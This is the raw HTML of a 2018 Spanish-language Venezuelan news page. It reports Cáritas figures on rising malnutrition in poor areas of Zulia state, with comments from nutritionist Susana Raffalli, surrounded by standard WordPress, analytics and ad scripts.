<!DOCTYPE html>
<!--[if IE 8]>
<html class="ie ie8" lang="es-ES" prefix="og: http://ogp.me/ns#"> <![endif]-->
<!--[if IE 9]>
<html class="ie ie9" lang="es-ES" prefix="og: http://ogp.me/ns#"> <![endif]-->
<!--[if gt IE 9]><!-->
<html lang="es-ES" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="pingback" href="http://elperiodicovenezolano.com/xmlrpc.php"/>

	<title>¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela</title>

<!-- Better Open Graph, Schema.org & Twitter Integration -->
<meta property="twitter:title" content="¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela"/>
<meta property="twitter:url" content="http://elperiodicovenezolano.com/alarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela/"/>
<meta property="twitter:card" content="summary"/>
<meta property="twitter:image" content="http://elperiodicovenezolano.com/wp-content/uploads/2018/02/desnutricion.jpg"/>
<!-- / Better Open Graph, Schema.org & Twitter Integration. -->

<!-- This site is optimized with the Yoast SEO Premium plugin v4.3.2 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://elperiodicovenezolano.com/alarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela/" />
<meta property="og:locale" content="es_ES" />
<meta property="og:type" content="article" />
<meta property="og:title" content="¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela" />
<meta property="og:description" content="Las zonas más vulnerables del estado Zulia registran casos de desnutrición más altos que las reportadas en 2017. Cáritas de Venezuela registró el pasado mes de diciembre índices de desnutrición de 56% en los sectores más pobres de Venezuela. En lo que va de año, aumentó 72%, de acuerdo con el portal zuliano La Verdad. &hellip;" />
<meta property="og:url" content="http://elperiodicovenezolano.com/alarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela/" />
<meta property="og:site_name" content="El Periódico Venezolano" />
<meta property="article:section" content="Noticias de Venezuela" />
<meta property="article:published_time" content="2018-02-05T07:00:58+00:00" />
<meta property="article:modified_time" content="2018-02-04T21:48:38+00:00" />
<meta property="og:updated_time" content="2018-02-04T21:48:38+00:00" />
<meta property="og:image" content="http://elperiodicovenezolano.com/wp-content/uploads/2018/02/desnutricion.jpg" />
<meta property="og:image:width" content="750" />
<meta property="og:image:height" content="500" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Las zonas más vulnerables del estado Zulia registran casos de desnutrición más altos que las reportadas en 2017. Cáritas de Venezuela registró el pasado mes de diciembre índices de desnutrición de 56% en los sectores más pobres de Venezuela. En lo que va de año, aumentó 72%, de acuerdo con el portal zuliano La Verdad. [&hellip;]" />
<meta name="twitter:title" content="¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela" />
<meta name="twitter:image" content="http://elperiodicovenezolano.com/wp-content/uploads/2018/02/desnutricion.jpg" />
<meta property="DC.date.issued" content="2018-02-05T07:00:58+00:00" />
<!-- / Yoast SEO Premium plugin. -->

<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="El Periódico Venezolano &raquo; Feed" href="http://elperiodicovenezolano.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="El Periódico Venezolano &raquo; RSS de los comentarios" href="http://elperiodicovenezolano.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="El Periódico Venezolano &raquo; ¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela RSS de los comentarios" href="http://elperiodicovenezolano.com/alarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/elperiodicovenezolano.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.2"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56794,8205,9794,65039],[55358,56794,8203,9794,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='better-playlist-css'  href='http://elperiodicovenezolano.com/wp-content/plugins/better-playlist/css/better-playlist.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='bf-better-social-font-icon-css'  href='http://elperiodicovenezolano.com/wp-content/themes/epv/includes/libs/better-framework/assets/css/better-social-font-icon.css?ver=2.7.11' type='text/css' media='all' />
<link rel='stylesheet' id='better-social-counter-css'  href='http://elperiodicovenezolano.com/wp-content/plugins/better-social-counter/css/style.css?ver=1.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='cptch_stylesheet-css'  href='http://elperiodicovenezolano.com/wp-content/plugins/captcha/css/front_end_style.css?ver=4.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://elperiodicovenezolano.com/wp-includes/css/dashicons.min.css?ver=4.9.2' type='text/css' media='all' />
<link rel='stylesheet' id='cptch_desktop_style-css'  href='http://elperiodicovenezolano.com/wp-content/plugins/captcha/css/desktop_style.css?ver=4.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='http://elperiodicovenezolano.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.3.0.2' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
#rs-demo-id {}
</style>
<link rel='stylesheet' id='wprssmi_template_styles-css'  href='http://elperiodicovenezolano.com/wp-content/plugins/wp-rss-multi-importer/templates/templates.css?ver=4.9.2' type='text/css' media='all' />
<link rel='stylesheet' id='better-bam-css'  href='http://elperiodicovenezolano.com/wp-content/plugins/better-adsmanager/css/bam.css?ver=1.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='better-reviews-css'  href='http://elperiodicovenezolano.com/wp-content/plugins/better-reviews/css/better-reviews.css?ver=1.1.0' type='text/css' media='all' />
<link rel='stylesheet' id='bf-pretty-photo-css'  href='http://elperiodicovenezolano.com/wp-content/themes/epv/includes/libs/better-framework/assets/css/pretty-photo.css?ver=2.7.11' type='text/css' media='all' />
<link rel='stylesheet' id='theme-libs-css'  href='http://elperiodicovenezolano.com/wp-content/themes/epv/css/theme-libs.css?ver=1.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='http://elperiodicovenezolano.com/wp-content/themes/epv/includes/libs/better-framework/assets/css/font-awesome.min.css?ver=2.7.11' type='text/css' media='all' />
<link rel='stylesheet' id='publisher-css'  href='http://elperiodicovenezolano.com/wp-content/themes/epv/style.css?ver=1.6.1' type='text/css' media='all' />
<!--[if lt IE 9]>
<link rel='stylesheet' id='bf-html5shiv-css'  href='http://elperiodicovenezolano.com/wp-content/themes/epv/includes/libs/better-framework/assets/js/html5shiv.min.js?ver=2.7.11' type='text/css' media='all' />
<![endif]-->
<!--[if lt IE 9]>
<link rel='stylesheet' id='bf-respond-css'  href='http://elperiodicovenezolano.com/wp-content/themes/epv/includes/libs/better-framework/assets/js/respond.min.js?ver=2.7.11' type='text/css' media='all' />
<![endif]-->
<link rel='stylesheet' id='better-weather-css'  href='http://elperiodicovenezolano.com/wp-content/plugins/better-weather/css/bw-style.css?ver=3.2.0' type='text/css' media='all' />
<link rel='stylesheet' id='jquery-lazyloadxt-spinner-css-css'  href='//elperiodicovenezolano.com/wp-content/plugins/a3-lazy-load/assets/css/jquery.lazyloadxt.spinner.css?ver=4.9.2' type='text/css' media='all' />
<link rel='stylesheet' id='better-framework-main-fonts-css'  href='https://fonts.googleapis.com/css?family=Lato:400%7CRoboto+Condensed:700,400italic,400%7CNoto+Sans:400' type='text/css' media='all' />
<link rel='stylesheet' id='publisher-theme-classic-magazine-css'  href='http://elperiodicovenezolano.com/wp-content/themes/epv//includes/styles/classic/magazine/style.css?ver=1.6.1' type='text/css' media='all' />
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/plugins/better-playlist/js/better-playlist.js?ver=1.3.0'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.3.0.2'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.3.0.2'></script>
<link rel='https://api.w.org/' href='http://elperiodicovenezolano.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://elperiodicovenezolano.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://elperiodicovenezolano.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.2" />
<link rel='shortlink' href='http://elperiodicovenezolano.com/?p=382254' />
<link rel="alternate" type="application/json+oembed" href="http://elperiodicovenezolano.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Felperiodicovenezolano.com%2Falarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://elperiodicovenezolano.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Felperiodicovenezolano.com%2Falarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela%2F&#038;format=xml" />
			<link rel="shortcut icon" href="http://elperiodicovenezolano.com/wp-content/uploads/2016/12/favicon16x16.png">			<link rel="apple-touch-icon" href="http://elperiodicovenezolano.com/wp-content/uploads/2016/12/favicon57x57.png">			<link rel="apple-touch-icon" sizes="114x114" href="http://elperiodicovenezolano.com/wp-content/uploads/2016/12/favicon114x114.png">			<link rel="apple-touch-icon" sizes="72x72" href="http://elperiodicovenezolano.com/wp-content/uploads/2016/12/favicon72x72.png">			<link rel="apple-touch-icon" sizes="144x144" href="http://elperiodicovenezolano.com/wp-content/uploads/2016/12/favicon144x144.png"><script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-36755640-1', 'auto');
  ga('send', 'pageview');

</script><meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://elperiodicovenezolano.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><link rel="amphtml" href="http://elperiodicovenezolano.com/alarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela/amp/" /><meta name="generator" content="Powered by Slider Revolution 5.3.0.2 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." />

<!-- BetterFramework Auto Generated CSS -->
<style type='text/css' media='screen'>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</style>
<!-- /BetterFramework Auto Generated CSS -->

<!-- BetterFramework Head Inline CSS -->
<style>
.bs-slider-1-item .post-meta {
    display: none;
}

</style>
<!-- /BetterFramework Head Inline CSS-->
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>

<body class="post-template-default single single-post postid-382254 single-format-standard active-light-box active-top-line ltr page-layout-2-col-right full-width active-sticky-sidebar main-menu-sticky-smart active-ajax-search  wpb-js-composer js-comp-ver-5.0.1 vc_responsive" dir="ltr" itemscope="itemscope" itemtype="http://schema.org/WebPage">	<div class="main-wrap">
	<header id="header" class="site-header header-style-1 boxed" itemscope="itemscope" itemtype="http://schema.org/WPHeader">
				<div class="header-inner">
			<div class="content-wrap">
				<div class="container">
					<div id="site-branding" class=" site-branding " itemtype="http://schema.org/Organization" itemscope="itemscope">
	<h2 id="site-title" class="logo img-logo" itemprop="headline">
	<a href="http://elperiodicovenezolano.com/" itemprop="url" rel="home">
					<img id="site-logo" src="http://elperiodicovenezolano.com/wp-content/uploads/2016/12/logo-epv.png"
			     alt="El Periódico&lt;span class=&quot;main-color&quot;&gt;Venezolano&lt;/span&gt;" itemprop="logo" data-bsrjs="http://elperiodicovenezolano.com/wp-content/uploads/2016/12/logo-epv@2x.png"  />
			</a>
</h2>
</div><!-- .site-branding -->
				</div>
			</div>
		</div>
		<div id="menu-main" class="menu main-menu-wrapper show-search-item" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
	<div class="main-menu-inner">
		<div class="content-wrap">
			<div class="container">

				<nav class="main-menu-container">
					<ul id="main-navigation" class="main-menu menu bsm-pure clearfix">
						<li id="menu-item-156" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-term-2 better-anim-fade menu-item-156"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></li>
<li id="menu-item-157" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-6 better-anim-fade menu-item-157"><a href="http://elperiodicovenezolano.com/noticias-internacionales/">Noticias Internacionales</a></li>
<li id="menu-item-158" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-10 better-anim-fade menu-item-158"><a href="http://elperiodicovenezolano.com/ocio/">Ocio</a></li>
<li id="menu-item-159" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-1 better-anim-fade menu-item-159"><a href="http://elperiodicovenezolano.com/salud/">Salud</a></li>
					</ul><!-- #main-navigation -->
											<div class="search-container close">
							<span class="search-handler"><i class="fa fa-search"></i></span>

							<div class="search-box clearfix">
								<form role="search" method="get" class="search-form clearfix" action="http://elperiodicovenezolano.com">
	<input type="search" class="search-field"
	       placeholder="Buscar..."
	       value="" name="s"
	       title="Buscar:"
	       autocomplete="off">
	<input type="submit" class="search-submit" value="Buscar">
</form><!-- .search-form -->
							</div>
						</div>
										</nav><!-- .main-menu-container -->

			</div>
		</div>
	</div>
</div><!-- .menu -->	</header><!-- .header -->
<div class="responsive-header clearfix light deferred-block-exclude">
	<div class="responsive-header-container clearfix">

		<div class="menu-container close">
			<span class="menu-handler">
				<span class="lines"></span>
			</span>

			<div class="menu-box clearfix"></div>
		</div><!-- .menu-container -->

		<div class="logo-container">
			<a href="http://elperiodicovenezolano.com/" itemprop="url" rel="home">
									<img src="http://elperiodicovenezolano.com/wp-content/uploads/2016/12/logo-epv.png"
					     alt="El Periódico Venezolano"  data-bsrjs="http://elperiodicovenezolano.com/wp-content/uploads/2016/12/logo-epv@2x.png"  />			</a>
		</div><!-- .logo-container -->

		<div class="search-container close">
			<span class="search-handler">
				<i class="fa fa-search"></i>
			</span>

			<div class="search-box clearfix">
				<form role="search" method="get" class="search-form clearfix" action="http://elperiodicovenezolano.com">
	<input type="search" class="search-field"
	       placeholder="Buscar..."
	       value="" name="s"
	       title="Buscar:"
	       autocomplete="off">
	<input type="submit" class="search-submit" value="Buscar">
</form><!-- .search-form -->
			</div>
		</div><!-- .search-container -->

	</div><!-- .responsive-header-container -->
</div><!-- .responsive-header -->
	<div class="content-wrap">
<main id="content" class="content-container" itemscope itemprop="mainContentOfPage" itemtype="http://schema.org/WebPageElement">
<div class="container layout-2-col layout-right-sidebar post-template-11">
	<div class="row main-section">

		<div class="col-sm-8 content-column ">
			<div class="single-container">
				<article id="post-382254" class="post-382254 post type-post status-publish format-standard has-post-thumbnail  category-noticias-venezuela single-post-content" itemscope="itemscope" itemtype="http://schema.org/Article">
					<div class="post-header post-tp-11-header"
					     style="background-image: url(http://elperiodicovenezolano.com/wp-content/uploads/2018/02/desnutricion-750x430.jpg);">
						<div class="post-header-inner">
							<div class="post-header-title">
								<div class="term-badges floated"><span class="term-badge term-2"><a href="http://elperiodicovenezolano.com/noticias-venezuela/">Noticias de Venezuela</a></span></div>								<h1 class="single-post-title">
									<span class="post-title" itemprop="headline">¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela</span></h1>
								<div class="post-meta single-post-meta">
			<span class="time"><time class="post-published updated" datetime="2018-02-05T07:00:58+00:00" title="lunes, febrero 5, 2018, 7:00 am">Feb 5, 2018</time></span>
		<span class="views" itemprop="interactionCount" data-bpv-post="382254"><i class="fa fa-eye"></i> 1</span><a href="http://elperiodicovenezolano.com/alarmante-los-niveles-de-desnutricion-en-las-zonas-pobres-de-venezuela/#respond" title="Deja tu comentario sobre: ​​&quot;¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela&quot;" class="comments" itemprop="interactionCount"><i class="fa fa-comments-o"></i> 0</a></div>
							</div>
						</div>
											</div>
							<div class="post-share single-post-share top-share">

			<span class="share-handler"></span>

			<ul class="social-list clearfix">
				<li class="social-item facebook"><a href="javascript: window.open('http://www.facebook.com/sharer.php?u=http://elperiodicovenezolano.com/?p=382254','_blank', 'width=900, height=450');" target="_blank" rel="nofollow"><i class="fa fa-facebook"></i><span class="item-title">Facebook</span></a></li><li class="social-item twitter"><a href="javascript: window.open('http://twitter.com/share?text=¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela&url=http://elperiodicovenezolano.com/?p=382254','_blank', 'width=900, height=450');" target="_blank" rel="nofollow"><i class="fa fa-twitter"></i><span class="item-title">Twitter</span></a></li><li class="social-item google_plus"><a href="javascript: window.open('http://plus.google.com/share?url=http://elperiodicovenezolano.com/?p=382254','_blank', 'width=500, height=450');" target="_blank" rel="nofollow"><i class="fa fa-google-plus"></i><span class="item-title">Google+</span></a></li><li class="social-item email"><a href="mailto:?subject=¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela&body=http://elperiodicovenezolano.com/?p=382254" target="_blank" rel="nofollow"><i class="fa fa-envelope"></i><span class="item-title">Email</span></a></li><li class="social-item whatsapp"><a href="whatsapp://send?text=¡Alarmante! Los niveles de desnutrición en las zonas pobres de Venezuela  

http://elperiodicovenezolano.com/?p=382254" target="_blank" rel="nofollow"><i class="fa fa-whatsapp"></i><span class="item-title">WhatsApp</span></a></li>			</ul>

		</div>
							<div class="entry-content clearfix single-post-content" itemprop="articleBody">
						<div class="betteradscontainer betterads-clearfix better-ads-post-top betterads-align-center betterad-column-1"><div id="betterad-161-21169697185a7874a80777e" class="betterad-container betterad-type-code " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="161" data-type="code"><span id="betterad-161-21169697185a7874a80777e-place"></span><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script type="text/javascript">function betteradsmanager_get_size_from_width( width ) { 											var size = ["125", "125"]; 											if ( width >= 728 )  												size = ["728", "90"]; 											else if ( width >= 468 ) 												size = ["468", "60"]; 											else if ( width >= 336 ) 												size = ["336", "280"]; 											else if ( width >= 300 ) 												size = ["300", "250"]; 											else if ( width >= 250 ) 												size = ["250", "250"]; 											else if ( width >= 200 ) 												size = ["200", "200"]; 											else if ( width >= 180 ) 												size = ["180", "150"]; 											return size; 										}function betteradsmanager_html_to_element(html) { 										    var template = document.createElement('template'); 										    template.innerHTML = html; 										    return template.content.firstChild; 										}</script><script type="text/javascript">betterads_screen_width = document.body.clientWidth;betterads_screen_width = document.body.clientWidth;betterads_el_place = document.getElementById('betterad-161-21169697185a7874a80777e-place');betterads_el = document.getElementById('betterad-161-21169697185a7874a80777e'); 								 								if (betterads_el.getBoundingClientRect().width) { 									betterads_el_width = betterads_el.getBoundingClientRect().width; 								} else { 									betterads_el_width = betterads_el.offsetWidth; 								} 								 								betterads_el_width = betteradsmanager_get_size_from_width( betterads_el_width );if ( betterads_screen_width >= 1140 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width >= 1019  && betterads_screen_width < 1140 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width >= 768  && betterads_screen_width < 1019 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width < 768 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}</script></div></div><p>Las zonas más vulnerables del estado Zulia registran casos de desnutrición más altos que las reportadas en 2017.</p>
<p>Cáritas de Venezuela registró el pasado mes de diciembre índices de desnutrición de 56% en los sectores más pobres de Venezuela. En lo que va de año, aumentó 72%, de acuerdo con el portal zuliano La Verdad.</p>
<p>Susana Raffalli, nutricionista y representante de la organización, consideró necesaria la participación del Estado para otorgar los recursos necesarios y sin fines políticos.</p>
<div class="betteradscontainer betterads-clearfix  betterads-post-inline betterads-align-center betterad-column-1 betterads-float-center">
<div id="betterad-161-14531741255a7874a8060e5" class="betterad-container betterad-type-code " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="161" data-type="code"><span id="betterad-161-14531741255a7874a8060e5-place"></span><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script type="text/javascript">function betteradsmanager_get_size_from_width( width ) { 											var size = ["125", "125"]; 											if ( width >= 728 )  												size = ["728", "90"]; 											else if ( width >= 468 ) 												size = ["468", "60"]; 											else if ( width >= 336 ) 												size = ["336", "280"]; 											else if ( width >= 300 ) 												size = ["300", "250"]; 											else if ( width >= 250 ) 												size = ["250", "250"]; 											else if ( width >= 200 ) 												size = ["200", "200"]; 											else if ( width >= 180 ) 												size = ["180", "150"]; 											return size; 										}function betteradsmanager_html_to_element(html) { 										    var template = document.createElement('template'); 										    template.innerHTML = html; 										    return template.content.firstChild; 										}</script><script type="text/javascript">betterads_screen_width = document.body.clientWidth;betterads_screen_width = document.body.clientWidth;betterads_el_place = document.getElementById('betterad-161-14531741255a7874a8060e5-place');betterads_el = document.getElementById('betterad-161-14531741255a7874a8060e5'); 								 								if (betterads_el.getBoundingClientRect().width) { 									betterads_el_width = betterads_el.getBoundingClientRect().width; 								} else { 									betterads_el_width = betterads_el.offsetWidth; 								} 								 								betterads_el_width = betteradsmanager_get_size_from_width( betterads_el_width );if ( betterads_screen_width >= 1140 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width >= 1019  && betterads_screen_width < 1140 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width >= 768  && betterads_screen_width < 1019 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width < 768 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}</script></div>
</div>
<p>Para la nutricionista no se están implementando las medidas necesarias para solucionar el problema de la alimentación, sumado a las dificultades que enfrenta el sector salud para encontrar los medicamentos en medio de la alta inflación que vive el país.</p>
<div class="betteradscontainer betterads-clearfix betterads-post-bottom betterads-align-center betterad-column-1"><div id="betterad-161-11133591405a7874a8079dd" class="betterad-container betterad-type-code " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="161" data-type="code"><span id="betterad-161-11133591405a7874a8079dd-place"></span><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script type="text/javascript">function betteradsmanager_get_size_from_width( width ) { 											var size = ["125", "125"]; 											if ( width >= 728 )  												size = ["728", "90"]; 											else if ( width >= 468 ) 												size = ["468", "60"]; 											else if ( width >= 336 ) 												size = ["336", "280"]; 											else if ( width >= 300 ) 												size = ["300", "250"]; 											else if ( width >= 250 ) 												size = ["250", "250"]; 											else if ( width >= 200 ) 												size = ["200", "200"]; 											else if ( width >= 180 ) 												size = ["180", "150"]; 											return size; 										}function betteradsmanager_html_to_element(html) { 										    var template = document.createElement('template'); 										    template.innerHTML = html; 										    return template.content.firstChild; 										}</script><script type="text/javascript">betterads_screen_width = document.body.clientWidth;betterads_screen_width = document.body.clientWidth;betterads_el_place = document.getElementById('betterad-161-11133591405a7874a8079dd-place');betterads_el = document.getElementById('betterad-161-11133591405a7874a8079dd'); 								 								if (betterads_el.getBoundingClientRect().width) { 									betterads_el_width = betterads_el.getBoundingClientRect().width; 								} else { 									betterads_el_width = betterads_el.offsetWidth; 								} 								 								betterads_el_width = betteradsmanager_get_size_from_width( betterads_el_width );if ( betterads_screen_width >= 1140 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width >= 1019  && betterads_screen_width < 1140 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width >= 768  && betterads_screen_width < 1019 ) { 								betterads_el_place.parentNode.replaceChild( betteradsmanager_html_to_element( '<ins class="adsbygoogle" style="display:inline-block;width:' + betterads_el_width[0] + 'px;height:' + betterads_el_width[1] + 'px" data-ad-client="ca-pub-4465543746950866" data-ad-slot="6550012838"></ins>' ), betterads_el_place ); 								(adsbygoogle = window.adsbygoogle || []).push({}); 							}else if ( betterads_screen_width < 768 ) { 